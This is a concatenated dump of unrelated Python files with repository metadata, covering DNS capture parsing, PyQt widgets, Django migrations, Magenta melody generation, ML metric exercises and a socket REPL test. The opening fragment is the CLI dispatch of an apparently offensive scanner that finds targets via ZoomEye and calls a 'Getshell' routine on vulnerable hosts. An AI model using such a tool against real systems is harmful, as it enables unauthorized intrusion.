parse.add_argument('-p',dest = 'PageNum',help = 'Search PageNum')
parse.add_argument('-d',dest = 'dictpath',help = 'Detection of URL in the file')
parse.add_argument('-s',dest = 'CtrlDict',help = 'Has confirmed the existence of loopholes, try to get shell')
args = parse.parse_args()
Action_check = args.check
Action_getshell = args.getshell
Action_Panel_Test = args.zoomeye
Search_keyword = args.keyword
PageNum = args.PageNum
filepath = args.dictpath
CtrlDictpath = args.CtrlDict
if(Action_Panel_Test != True and filepath == None and CtrlDictpath == None):
TmpUrl = urlparse.urlparse(args.url)
host= TmpUrl.netloc.split(':')
TestUrl = urlparse.urlunparse((TmpUrl.scheme,TmpUrl.netloc,'/','','',''))
new_scan = scan()
if Action_check == True:
print 'Start Test...'
new_scan.Check(TestUrl)
if(Action_getshell == True):
new_scan.Getshell(TestUrl , host[0] , host[1])
if(Action_Panel_Test == True):
new_scan.Panel_Scan(Search_keyword,PageNum)
if(filepath != None):
new_scan.filescan(filepath)
if(CtrlDictpath != None):
new_scan.filegetshell(CtrlDictpath)
|
[
"1123302584@qq.com"
] |
1123302584@qq.com
|
498da4533e4674142210175eb4143f97f45fb56d
|
bb1c9216868de6244a72d3fc1d4f6be0d7dc4ea4
|
/UpdateFactorDatabase/FundamentalFactors/FactorAlgos/Profitability/CashFlowMargin_TTM.py
|
9b2fba6225722035391ab0ed83320c7c222568e1
|
[] |
no_license
|
wusf/MyQunatLib
|
9e430c4be101f470a66c5faa38b9a082a9b4f7a5
|
5156d9b18dd37c5cda6bf8169497a8432fe083a1
|
refs/heads/master
| 2021-01-21T04:55:39.147432
| 2016-07-22T05:26:17
| 2016-07-22T05:26:17
| 48,779,521
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: Wusf --<wushifan221@gmail.com>
Purpose:
Created: 2016/1/12
"""
#----------------------------------------------------------------------
def Calc(cur,acctPeriods,p,s,date,stkCode):
"""
计算过去12个月CashFlowMargin
cur:内存数据库cursor
date:查询当日的日期和数据有效的最早日期
stkCode:股票代码
"""
begDate = date[0]
endDate = date[1]
sql = """
SELECT CFO_TTM/Sales_TTM
FROM FinancialPITData
WHERE StkCode='{}'
AND DeclareDate>='{}'
AND DeclareDate<='{}'
ORDER BY DeclareDate DESC LIMIT 1
"""
cur.execute(sql.format(stkCode,begDate,endDate))
content = cur.fetchone()
if content==None:
return None
if content[0]==None:
return None
v = content[0]
#print v,s,p
return v
|
[
"wushifan221@gmail.com"
] |
wushifan221@gmail.com
|
ea8abfa4667e8e810e2e912a2070a29eace34964
|
29372d402db9293e28c51b620b9f98dacbaf6260
|
/Processing/Section 3/Listing3/Listing3.pyde
|
fd8ec1b6e79927339f18259734371fdfdc5ccbe3
|
[
"MIT"
] |
permissive
|
Grigory526/2019-fall-polytech-cs
|
9cfb053084657da3e337f413c66f9ac36466b0ca
|
1e87472fa128f6d69a3b99118e04ce4cce9ac70a
|
refs/heads/master
| 2020-07-27T03:37:54.677364
| 2019-12-21T17:11:10
| 2019-12-21T17:11:10
| 208,854,212
| 1
| 0
|
MIT
| 2019-09-16T17:07:01
| 2019-09-16T17:07:01
| null |
UTF-8
|
Python
| false
| false
| 271
|
pyde
|
def setup():
size(500, 500)
smooth()
background(255)
noLoop()
fill(50, 80)
stroke(100)
strokeWeight(3)
def draw():
ellipse(250,200,100,100)
ellipse(250-50,250,100,100);
ellipse(250+50,250,100,100)
ellipse(250,250+50,100,100)
|
[
"bakaenko.gi@edu.spbstu.ru"
] |
bakaenko.gi@edu.spbstu.ru
|
529802340e8ded3a16e40bd4da845392f90caa2f
|
eb9e5f950f567458deb7ac6a958e9e07eec8211c
|
/Python/Projects/dbtest/people/migrations/0002_auto_20161204_1710.py
|
0dafaaee79bea0c99b52161d0c3317aec9b33cc8
|
[] |
no_license
|
hyteer/ytest
|
b32402f4a85af2cba298729b81ae73ccedbe6013
|
98234f88e923a705ce08673a269904ca81117f03
|
refs/heads/master
| 2020-01-23T21:47:40.100472
| 2017-01-23T10:12:21
| 2017-01-23T10:12:21
| 74,676,200
| 0
| 0
| null | 2017-01-23T10:12:22
| 2016-11-24T13:34:34
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 824
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-04 09:10
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('people', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='person',
name='age',
field=models.CharField(default=None, max_length=10),
),
migrations.AddField(
model_name='person',
name='created_time',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='person',
name='email',
field=models.EmailField(default=None, max_length=254),
),
]
|
[
"hyteer@qq.com"
] |
hyteer@qq.com
|
0804c050636b0238be93856f4924ef5b5e6e7afb
|
0f51a8ef5caf757cbbfe0a3624b6ba10251193f8
|
/warehouse/packaging/interfaces.py
|
cfd2a042685b61630bc25a3759f05e279febda1b
|
[
"Apache-2.0"
] |
permissive
|
cuiqiang/warehouse
|
a2bd83b9a5de9ede0c3c1052f5d9087e4dd9af10
|
c7a5174b90f6a4e70c9e7c4723d1fce5cb22d9b1
|
refs/heads/master
| 2020-12-26T03:45:02.616887
| 2015-05-10T13:59:15
| 2015-05-10T13:59:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 994
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from zope.interface import Interface
class IDownloadStatService(Interface):
def get_daily_stats(project):
"""
Return the daily download counts for the given project.
"""
def get_weekly_stats(project):
"""
Return the weekly download counts for the given project.
"""
def get_monthly_stats(project):
"""
Return the monthly download counts for the given project.
"""
|
[
"donald@stufft.io"
] |
donald@stufft.io
|
5a0fd84ce2aa02ed1b842c00529489bfbbf556c4
|
04b5ff9b8e8c64b3150667c6c59172432d28999c
|
/wireshark/wireshark_dns_capture.py
|
4c3de291a8b470df3ec5e052d2dd31d74ccaeac0
|
[
"MIT"
] |
permissive
|
jeffrade/python-collections
|
d910be280760c18b021b6ad1b099110c74f23b93
|
f40bbd4f3f1ceb1d688e9938b0c0aaa98b7f72f4
|
refs/heads/master
| 2021-07-15T12:09:21.600610
| 2021-03-10T15:16:18
| 2021-03-10T15:16:18
| 101,828,426
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,549
|
py
|
import sys
import re
def main(filename, args):
print('starting...')
capture = WiresharkDnsCapture(args[0])
capture.find()
print('DONE!')
class WiresharkDnsCapture():
__dns_file_location = None
__out_file = None
__dns_domain = []
def __init__(self, dns_file_location):
self.__dns_file_location = dns_file_location
out_file = "%s%s" % (dns_file_location, '.clean')
self.__out_file = open(out_file, 'w')
def find(self):
print('entering find...')
self.__createDnsList()
self.__readDnsAndWriteToOut()
def __createDnsList(self):
print('entering __createDnsList...')
with open(self.__dns_file_location) as file:
for index, line in enumerate(file):
domain_array = line.split("CNAME ")
ip_array = re.findall( r'[0-9]{1,3}(?:\.[0-9]{1,3}){3}', line)
if(len(domain_array) > 1 and len(ip_array) > 0):
domain = self.__cleanText(domain_array[1].split(" ")[0])
if(domain not in self.__dns_domain):
self.__dns_domain.append(domain)
def __readDnsAndWriteToOut(self):
print('entering __readDnsAndWriteToOut...')
for domain in self.__dns_domain:
self.__writeToOutFile(domain)
def __writeToOutFile(self, line):
self.__out_file.write("%s%s" % (line, "\n"))
def __cleanText(self, text):
return text.replace("\n", "")
if __name__ == '__main__':
main(__file__, sys.argv[1:])
|
[
"jeffrade@users.noreply.github.com"
] |
jeffrade@users.noreply.github.com
|
cd563ed6215b53d734e3d8c511ab618f732371e7
|
4e2dbf2b255a40f06c0490c6ce62d53f61a865ee
|
/Praktikum/Modul 5/QDateEdit.py
|
6ab8fc5e892ab2de1a68a3488a9875ba396984c1
|
[] |
no_license
|
NabilahSharfina/PEMROGRAMANGUI
|
7a3947e94fd2dc0dd2e5e9ad79e8899814e3e088
|
8b67cbd13c176b24c5238ebd9087c68b42762af2
|
refs/heads/main
| 2023-08-21T23:58:16.885539
| 2021-10-15T00:05:27
| 2021-10-15T00:05:27
| 358,811,701
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,945
|
py
|
import sys
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
class MainForm(QWidget):
def __init__(self):
super().__init__()
self.setupUi()
def setupUi(self):
self.resize(400, 100)
self.move(300, 300)
self.setWindowTitle('Demo QDateTimeEdit')
self.dateLabel = QLabel('Tanggal')
self.dateEdit = QDateEdit()
self.dateEdit.setDisplayFormat('dddd dd/MM/yyyy')
self.dateEdit.setDate(QDate.currentDate())
self.timeLabel = QLabel('Waktu')
self.timeEdit = QTimeEdit()
self.timeEdit.setDisplayFormat('hh:mm')
self.timeEdit.setTime(QTime.currentTime())
self.dateTimeLabel = QLabel('Tanggal dan Waktu')
self.dateTimeEdit = QDateTimeEdit()
self.dateTimeEdit.setDisplayFormat('dddd dd/MM/yyyy hh:mm')
self.dateTimeEdit.setDateTime(QDateTime.currentDateTime())
self.okButton = QPushButton('&OK')
hbox = QHBoxLayout()
hbox.addStretch()
hbox.addWidget(self.okButton)
layout = QGridLayout()
layout.addWidget(self.dateLabel, 0, 0)
layout.addWidget(self.dateEdit, 0, 1)
layout.addWidget(self.timeLabel, 1, 0)
layout.addWidget(self.timeEdit, 1, 1)
layout.addWidget(self.dateTimeLabel, 2, 0)
layout.addWidget(self.dateTimeEdit, 2, 1)
layout.addLayout(hbox, 3, 0, 1, 2)
self.setLayout(layout)
self.okButton.clicked.connect(self.okButtonClick)
def okButtonClick(self):
QMessageBox.information(self, 'Informasi', 'Date: ' + self.dateEdit.date().toString() + '\n' + 'Time: ' +
self.timeEdit.time().toString() + '\n' + 'Datetime: ' + self.dateTimeEdit.dateTime().toString() + '\n')
if __name__ == '__main__':
a = QApplication(sys.argv)
form = MainForm()
form.show()
a.exec_()
|
[
"noreply@github.com"
] |
NabilahSharfina.noreply@github.com
|
b402fedd165b97de4032cb90d940543aff9f9d3b
|
5c5b34f6f598a43ddfbd473228737a27c26d1d8e
|
/22_括号生成.py
|
214e398a4ac5e763162057d30f752d405069e313
|
[] |
no_license
|
lovehhf/LeetCode
|
34a1bc140b10dc83a32ef9a70f9c73176948a9c4
|
5d3574ccd282d0146c83c286ae28d8baaabd4910
|
refs/heads/master
| 2021-11-04T04:52:34.518621
| 2021-10-26T15:34:47
| 2021-10-26T15:34:47
| 173,673,492
| 0
| 0
| null | 2020-03-03T14:54:09
| 2019-03-04T04:26:15
|
Python
|
UTF-8
|
Python
| false
| false
| 2,370
|
py
|
# -*- coding:utf-8 -*-
__author__ = 'huanghf'
"""
给出 n 代表生成括号的对数,请你写出一个函数,使其能够生成所有可能的并且有效的括号组合。
例如,给出 n = 3,生成结果为:
[
"((()))",
"(()())",
"(())()",
"()(())",
"()()()"
]
n = 2:
["()()","(())"]
"""
class Solution:
def generateParenthesis(self, n):
"""
dfs添加所有有效括号
剪枝:
1. 每次可以放置左括号的条件是当前左括号的数目不超过n
2. 每次可以放置右括号的条件是当前右括号的数目不超过左括号的数目
:type n: int
:rtype: List[str]
"""
def dfs(left, right, n, path, res):
if left == n and right == n:
res.append(path)
return
if left < n:
dfs(left + 1, right, n, path + '(', res)
if right < left:
dfs(left, right + 1, n, path + ')', res)
res = []
dfs(0, 0, n, '', res)
return res
def generateParenthesis3(self, n):
"""
闭合数
看不懂。
:param n:
:return:
"""
if n == 0: return ['']
ans = []
for c in range(n):
for left in self.generateParenthesis(c):
for right in self.generateParenthesis(n - 1 - c):
ans.append('({}){}'.format(left, right))
return ans
def generateParenthesis2(self, n: int):
"""
暴力生成
:param n:
:return:
"""
ans = []
def valid(A):
bal = 0
for c in A:
if c == "(":
bal += 1
else:
bal -= 1
if bal < 0:
return False
return bal == 0
def generate(A):
if len(A) == 2 * n:
if valid(A):
ans.append("".join(A))
else:
print(A)
# 使用递归生成所有序列
A.append("(")
generate(A)
A.pop()
A.append(')')
generate(A)
A.pop()
generate([])
return ans
n = 3
s = Solution()
print(s.generateParenthesis(n))
|
[
"853885165@qq.com"
] |
853885165@qq.com
|
2d34a43c3b4450c07e06545c33f29a7ef89ab745
|
bf59746b818fae750ed8f21c66d1fb184da1aecc
|
/p3-avaliacao/resultado.py
|
851c3724274cda08423f1d99ee37c92486c4754c
|
[] |
no_license
|
bpoliana/praticas-minicurso-ml
|
cf29eb08f0795d38e62094543a0e1eea8cddf23b
|
b9fa6de24101ae0d123efbb614013bcbd8f2b3dc
|
refs/heads/master
| 2022-12-10T16:13:08.871630
| 2020-09-02T12:11:46
| 2020-09-02T12:11:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,108
|
py
|
from sklearn.exceptions import UndefinedMetricWarning
import optuna
import numpy as np
import pandas as pd
import warnings
from typing import List
class Resultado():
def __init__(self, y:List[float], predict_y:List[float]):
"""
y: Vetor numpy (np.array) em que, para cada instancia i, y[i] é a classe alvo da mesma
predict_y: Vetor numpy (np.array) que representa a predição y[i] para a instancia i
Tanto y quando predict_y devem assumir valores numéricos
"""
self.y = y
self.predict_y = predict_y
self._mat_confusao = None
self._precisao = None
self._revocacao = None
@property
def mat_confusao(self) -> np.ndarray:
"""
Retorna a matriz de confusão.
O retorno np.ndarray é um array numpy, neste caso, a matriz de confusão
"""
#caso a matriz de confusao já esteja calculada, retorna-la
if self._mat_confusao is not None:
return self._mat_confusao
#instancia a matriz de confusao como uma matriz de zeros
#A matriz de confusão será o máximo entre os valores de self.y e self.predict_y
max_class_val = max([self.y.max(),self.predict_y.max()])
self._mat_confusao = np.zeros((max_class_val+1,max_class_val+1))
#incrementa os valores da matriz baseada nas listas self.y e self.predict_y
for i,classe_real in enumerate(self.y):
self._mat_confusao[classe_real][self.predict_y[i]] += 1
#print("Predict y: "+str(self.predict_y))
#print("y: "+str(self.y))
#print("Matriz de confusao final :"+str(self._mat_confusao))
return self._mat_confusao
@property
def precisao(self) -> float:
"""
Precisão por classe
"""
if self._precisao is not None:
return self._precisao
#inicialize com um vetor de zero usando np.zeros
self._precisao = np.zeros(len(self.mat_confusao))
#para cada classe, armazene em self._precisao[classe] o valor relativo à precisão
#dessa classe
for classe in range(len(self.mat_confusao)):
#obtnha todos os elementos que foram previstos com essa classe
num_previstos_classe = 0
for classe_real in range(len(self.mat_confusao)):
num_previstos_classe += self.mat_confusao[classe_real][classe]
#precisao: numero de elementos previstos corretamente/total de previstos com essa classe
#calcule a precisão para a classe
if num_previstos_classe!=0:
self._precisao[classe] = self.mat_confusao[classe][classe]/num_previstos_classe
else:
self._precisao[classe] = 0
warnings.warn("Não há elementos previstos para a classe "+str(classe)+" precisão foi definida como zero.", UndefinedMetricWarning)
return self._precisao
@property
def revocacao(self) -> float:
if self._revocacao is not None:
return self._revocacao
self._revocacao = np.zeros(len(self.mat_confusao))
for classe in range(len(self.mat_confusao)):
#por meio da matriz, obtem todos os elementos que são dessa classe
num_classe = 0
num_elementos_classe = 0
for classe_prevista in range(len(self.mat_confusao)):
num_elementos_classe += self.mat_confusao[classe][classe_prevista]
#revocacao: numero de elementos previstos corretamente/total de elementos dessa classe
if num_elementos_classe!=0:
self._revocacao[classe] = self.mat_confusao[classe][classe]/num_elementos_classe
else:
self._revocacao[classe] = 0
warnings.warn("Não há elementos da classe "+str(classe)+" revocação foi definida como zero.", UndefinedMetricWarning)
return self._revocacao
@property
def f1_por_classe(self) -> float:
"""
retorna um vetor em que, para cada classe, retorna o seu f1
"""
f1 = np.zeros(len(self.mat_confusao))
for classe in range(len(self.mat_confusao)):
if(self.precisao[classe]+self.revocacao[classe] == 0):
f1[classe] = 0
else:
f1[classe] = 2*(self.precisao[classe]*self.revocacao[classe])/(self.precisao[classe]+self.revocacao[classe])
return f1
@property
def macro_f1(self):
#Atividade 1: substitua o none...lembre-se que já foi calculado o
#f1 por classe no atributo calculado correspondente.
#Lembre-se de como usar atributos calculados.
return None
@property
def acuracia(self):
#quantidade de elementos previstos corretamente
num_previstos_corretamente = 0
for classe in range(len(self.mat_confusao)):
#Atividade 1: complete o código abaixo, substituindo o None
num_previstos_corretamente += None
return num_previstos_corretamente/len(self.y)
class Fold():
def __init__(self,df_treino :pd.DataFrame, df_data_to_predict:pd.DataFrame,
col_classe:str,num_folds_validacao:int=0,num_repeticoes_validacao:int=0):
self.df_treino = df_treino
self.df_data_to_predict = df_data_to_predict
self.col_classe = col_classe
#Atividade 3(b): Inicialize o arr_folds_validacao apropriadamente
if num_folds_validacao>0:
self.arr_folds_validacao = self.gerar_k_folds(df_treino,num_folds_validacao,col_classe,num_repeticoes_validacao)
else:
self.arr_folds_validacao = []
@staticmethod
def gerar_k_folds(df_dados,val_k:int,col_classe:str,num_repeticoes:int=1,seed:int=1,
num_folds_validacao:int=0,num_repeticoes_validacao:int=1) -> List["Fold"]:
"""
Implementar esta função de acordo com os comentários no código
Retorna um vetor arr_folds com todos os k folds criados a partir do DataFrame df
df: DataFrame com os dados a serem usados
val_k: parametro k da validação cruzada de k-folds
col_classe: coluna que representa a classe
seed: seed para a amostra aleatória
"""
#1. especifique o número de instancias por fold usando
#...o parametro val_k
num_instances_per_partition = None
#folds de saida
arr_folds = []
for num_repeticao in range(num_repeticoes):
#2. Embaralhe os dados: para isso, use o método sample para fazer uma amostra aleatória usando 100% dos dados. Use a seed passada como parametro
#lembre-se que, para cada repetição, deve-se haver uma seed diferente
#para isso, use seed+num_repeticao
df_dados_rand = None
#Impressão dos ids dos dados (exiba o print para testes)
#print("Dados: "+str(df.index.values))
#para cada fold num_fold:
for num_fold in range(val_k):
#2. especifique o inicio e fim do fold de teste. Caso seja o ultimo, o fim será o tamanho do vetor.
#Use num_instances_per_partition e num_fold para deliminar o inicio e fim do teste
ini_fold_to_predict = None
if num_fold < val_k-1:
fim_fold_to_predict = None
else:
fim_fold_to_predict = None
#print(f"Inicio: {ini_fold_to_predict} - Fim: {fim_fold_to_predict}")
#3. por meio do df_dados_rand, obtenha os dados de avaliação (teste ou validação)
df_to_predict = None
#print(df_to_predict)
#4. Crie o treino por meio dos dados originais (df_dados_rand),
#removendo os dados que serão avaliados (df_to_predict)
df_treino = None
#print(df_treino)
#5. Crie o fold (objeto da classe Fold) para adicioná-lo no vetor
fold = None
arr_folds.append(fold)
#imprime o número instancias por fold (descomente para testes)
"""
for num_repeticao in range(num_repeticoes):
for num_fold in range(val_k):
i = val_k*num_repeticao+num_fold
df_treino = arr_folds[i].df_treino
df_to_predict = arr_folds[i].df_data_to_predict
qtd_treino = len(df_treino.index)
qtd_to_predict = len(df_to_predict.index)
print(f"Repeticao #{num_repeticao} Fold #{num_fold} instancias no treino: {qtd_treino} teste: {qtd_to_predict}")
print(f"\tÍndices das instancias do treino: {df_treino.index.values}")
print(f"\tÍndices das instancias a avaliar (teste ou validação): {df_to_predict.index.values}")
print(" ")
"""
return arr_folds
def __str__(self):
return f"Treino: \n{self.df_treino}\n Dados a serem avaliados (teste ou validação): {self.df_data_to_predict}"
def __repr__(self):
return str(self)
|
[
"prof.daniel.hasan@gmail.com"
] |
prof.daniel.hasan@gmail.com
|
fb1f8e94a653194037e6c712b7c8613a7f8f23c8
|
9a4fb95d07b41c3a9b30971f97f88f279192cd2d
|
/DevelopmentFiles/mag_start.py
|
687c793ffb3c44e479726c5da3ea97249df63604
|
[] |
no_license
|
matheucampbell/RealtimeMelodies
|
5cf527651ef4ee122aad0870f0a363be554d1ceb
|
7bdb07a75867d6f0c8c994033b06455768abc0ed
|
refs/heads/main
| 2023-07-01T21:15:39.778398
| 2021-08-13T23:22:46
| 2021-08-13T23:22:46
| 344,292,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,806
|
py
|
import magenta # Google's ML for Art and Music Module
import note_seq # Serialized input for notes based on frequency and duration
import tensorflow # Generalized machine learning package
print("Starting...")
# Creating Sequence (Melody A: C# Minor 4/4)
mel = note_seq.protobuf.music_pb2.NoteSequence() # Initialize NoteSequence object
note_list = ((61, 0, 1), (61, 1, 1.5), (64, 1.5, 2), (66, 2, 2.5), (69, 2.5, 3),
(68, 3, 4), (64, 4, 4.5), (66, 4.5, 5), (64, 5, 5.5), (63, 5.5, 6),
(61, 6, 7), (60, 7, 8)) # List of notes in the form (freq, start, end)
for note in note_list: # Add all the notes
mel.notes.add(pitch=note[0], start_time=note[1], end_time=note[2],
velocity=80)
mel.tempos.add(qpm=90)
# Convert note_seq to MIDI for storage and playback
note_seq.sequence_proto_to_midi_file(mel, 'Input/in.mid')
# Import Dependencies
from magenta.models.melody_rnn import melody_rnn_sequence_generator
from magenta.models.shared import sequence_generator_bundle
from note_seq.protobuf import generator_pb2
from note_seq.protobuf import music_pb2
# Initialize Model
bundle = sequence_generator_bundle.read_bundle_file('Src/basic_rnn.mag') # Loads model for use
generator_map = melody_rnn_sequence_generator.get_generator_map()
melody_rnn = generator_map['basic_rnn'](checkpoint=None, bundle=bundle)
melody_rnn.initialize()
# Model Parameters
steps = 16
tmp = 1.0 # Measure of the generation's "temperature". Higher = More scattered/random
# Initialize Generator
gen_options = generator_pb2.GeneratorOptions()
gen_options.args['temperature'].float_value = tmp
gen_section = gen_options.generate_sections.add(start_time=8, end_time=16)
out = melody_rnn.generate(mel, gen_options)
note_seq.sequence_proto_to_midi_file(out, 'Output/out.mid')
|
[
"noreply@github.com"
] |
matheucampbell.noreply@github.com
|
5cfc48c150ed0cce679cfff781322b5e69a63722
|
d0792d43fad5a607d232d76d2337e0043bb6ba72
|
/test_ingress.py
|
3804e571227e49ad29f984fe4bd897119e9ac6b1
|
[
"MIT"
] |
permissive
|
tebeka/ingress
|
0add5003ade060e8bf5d579f77bb233de75a4dd7
|
aa19ed9a95b7a784629ad71f0dddc84017d897ba
|
refs/heads/main
| 2023-08-07T15:38:53.545488
| 2023-06-14T12:05:00
| 2023-06-14T12:05:00
| 157,278,670
| 6
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,794
|
py
|
from socket import error as SocketError
from socket import socket
from time import sleep, time
import re
import ingress
def free_port():
sock = socket()
sock.listen(0)
port = sock.getsockname()[1]
sock.close()
return port
def wait_for_server(port, timeout=10):
start = time()
while time() - start <= timeout:
sock = socket()
try:
sock.connect(('localhost', port))
return sock
except SocketError:
sleep(0.1)
return None
def start_server(passwd=None):
port = free_port()
env = {}
ingress.install(('localhost', port), env, passwd)
assert wait_for_server(port), 'server did not start'
return Client(port)
class Client:
def __init__(self, port):
sock = wait_for_server(port)
self.rfile, self.wfile = sock.makefile('r'), sock.makefile('w')
def write(self, msg):
self.wfile.write(f'{msg}\n')
self.wfile.flush()
def read(self, prefix_len=0):
out = self.rfile.readline().strip()
prefix_len += len(ingress.PyHandler.prompt)
return out[prefix_len:]
def test_ingress():
c = start_server()
header = c.read()
assert 'ingress' in header, 'bad header'
c.write('1 + 1')
out = c.read()
assert out == '2', 'bad output'
def test_password():
passwd = 's3cr3t'
c = start_server(passwd)
c.read() # Skip header
c.write(f'{passwd}')
c.write('1 + 1')
out = c.read(len('Password: '))
assert out == '2', 'bad output'
def test_exec():
c = start_server()
c.read() # skip header
key, val = 'zaphod', 12
c.write(f'{key} = {val}')
c.write(key)
# FIXME: Why the prompt?
out = re.sub('^>* ', '', c.read())
assert out == str(val), 'bad value'
|
[
"miki.tebeka@gmail.com"
] |
miki.tebeka@gmail.com
|
ecf1cc3de1218708a5d736282e9bbcb9d5202ac1
|
d4ee3c7f4a3e5d9d9a9ed9c3cc83ca7e27f4c114
|
/LinearSVC/analyze_hyperparameters.py
|
c0a4479abdc8eeaf11dee46d3bd1553fb0dfaf5b
|
[] |
no_license
|
anuprulez/sklearn_hyperparameter_analysis
|
963217ca550c33f371d441ed37c28d6fb21fb917
|
d986c57a29184b7cbd446430f5f04d14e765d804
|
refs/heads/master
| 2020-03-26T12:11:25.784854
| 2018-09-20T16:58:25
| 2018-09-20T16:58:25
| 144,880,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,691
|
py
|
"""
Analyze hyperparameters of sklearn machine learning algorithms
"""
import sys
import numpy as np
import time
import os
from os import listdir
from os.path import isfile, join
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from mpl_toolkits.mplot3d import Axes3D
# file paths
CURRENT_WORKING_DIR = os.getcwd()
DATA_DIR = CURRENT_WORKING_DIR + "/results/penaltyterm/"
class AnalyseHyperparameters:
@classmethod
def __init__(self):
""" Init method. """
@classmethod
def read_file(self, path):
"""
Read a file
"""
return pd.read_csv(path, '\t')
@classmethod
def analyze_parameters(self):
"""
Analyse the hyperparameters and compute correlation
"""
files = [ file for file in os.listdir(DATA_DIR) if isfile(join(DATA_DIR, file))]
print files
NUM_COLORS = len(files)
cm = plt.get_cmap('gist_rainbow')
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)])
for index, file in enumerate(files):
file_content = self.read_file(join(DATA_DIR, file))
ax.scatter(file_content['param_estimator__C'], file_content['mean_test_score'])
plt.legend(files)
plt.show()
if __name__ == "__main__":
if len(sys.argv) != 1:
print( "Usage: python analyze_hyperparameters.py" )
exit( 1 )
start_time = time.time()
parameters = AnalyseHyperparameters()
parameters.analyze_parameters()
end_time = time.time()
print ("Program finished in %s seconds" % str( end_time - start_time ))
|
[
"anup.rulez@gmail.com"
] |
anup.rulez@gmail.com
|
3356162bea19609ee75fb123fdd0be02180f93b3
|
d498630988c48046d71fb80d3851c571e96d59a5
|
/os.py
|
cff6c856d2e00891a8eff75c05b025d95753fd30
|
[] |
no_license
|
khatriharsh28/harshalkhond.github.io
|
7fbfb54917f8b78492f54e77e515f3d7cfeb9d98
|
d50dc472cb0b33a3a02c7eb5a84624daeee894f3
|
refs/heads/main
| 2023-08-24T02:51:59.018114
| 2021-10-24T14:12:50
| 2021-10-24T14:12:50
| 413,125,019
| 0
| 0
| null | 2021-10-03T16:07:18
| 2021-10-03T15:59:33
|
HTML
|
UTF-8
|
Python
| false
| false
| 488
|
py
|
from PIL import Image,ImageEnhance,ImageFilter
img1=Image.open("ph1.jfif")
max_size=(1500,500)
img1.thumbnail(max_size)
img1.save('ph1.jpg')
#import os
#for item in os.listdir():
#if item.endswith('.jpg'):
#img1=Image.open(item)
#filename,extension=os.path.splitext(item)
#img1.save(f'cab33.jpg')
#img1=Image.open('ccat.jpg')
#enhancer=ImageEnhance.Brightness(img1)
#img2=enhancer.enhance(2)
#img2=img1.filter(ImageFilter.GaussianBlur(radius=4))
#img2.save('xcat.jpg')
|
[
"86038877+harshalkhond@users.noreply.github.com"
] |
86038877+harshalkhond@users.noreply.github.com
|
6c8279bcc600b8aa085d7863a045ad03ab736f3a
|
083ca3df7dba08779976d02d848315f85c45bf75
|
/RepeatedSubstringPattern3.py
|
0f9bf90bef96e168810a12031264881ddf073304
|
[] |
no_license
|
jiangshen95/UbuntuLeetCode
|
6427ce4dc8d9f0f6e74475faced1bcaaa9fc9f94
|
fa02b469344cf7c82510249fba9aa59ae0cb4cc0
|
refs/heads/master
| 2021-05-07T02:04:47.215580
| 2020-06-11T02:33:35
| 2020-06-11T02:33:35
| 110,397,909
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
class Solution:
def repeatedSubstringPattern(self, s: str) -> bool:
i, j = 1, 0
n = len(s)
dp = [0] * (n + 1)
while i < n:
if s[i] == s[j]:
i += 1
j += 1
dp[i] = j
elif j == 0:
i += 1
else:
j = dp[j]
return dp[-1] != 0 and (dp[-1] % (n - dp[-1]) == 0)
if __name__ == '__main__':
s = input()
solution = Solution()
print(solution.repeatedSubstringPattern(s))
|
[
"jiangshen95@163.com"
] |
jiangshen95@163.com
|
201a8caa2ac0e35c9721887f358f1fafa9e92878
|
deb939988a000a87e3145f283b57a3b3f128d4bd
|
/activity/admin.py
|
2858af38ba7a1b73619b19ab4c75e44aecb6d489
|
[] |
no_license
|
Satendra124/cht-backend
|
abd18ed3bc4241acd6aadbb6ad60906199bf2241
|
d353f98c36e574c62ab91f75574dfa16bbabda55
|
refs/heads/main
| 2023-08-16T03:33:59.388814
| 2021-09-30T14:00:52
| 2021-09-30T14:00:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
from django.contrib import admin
from .models import Activity, SleepEvent, Survey, UsageData
# Register your models here.
class SleepAdmin(admin.ModelAdmin):
readonly_fields = ('time_end',)
admin.site.register(Activity)
admin.site.register(Survey)
admin.site.register(UsageData)
admin.site.register(SleepEvent,SleepAdmin)
|
[
"satendra.raj1241@gmail.com"
] |
satendra.raj1241@gmail.com
|
62c4578335124006470ede4c2761da6bf679eb64
|
93c9e3697c9e17b52561d54dfbb31cc8c5a765eb
|
/cool_django/wsgi.py
|
f641d39713a8b95b4a89578ee21a645e880d8447
|
[] |
no_license
|
minar09/cool-django
|
d065976dcf1d1e191bc3f4bfb2b66b47d41cf637
|
7ad1d04882f7d6e8b177ee99354d5c7ad3c97ed6
|
refs/heads/master
| 2021-01-12T10:58:39.483361
| 2016-11-05T06:02:38
| 2016-11-05T06:02:38
| 72,778,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
"""
WSGI config for cool_django project.
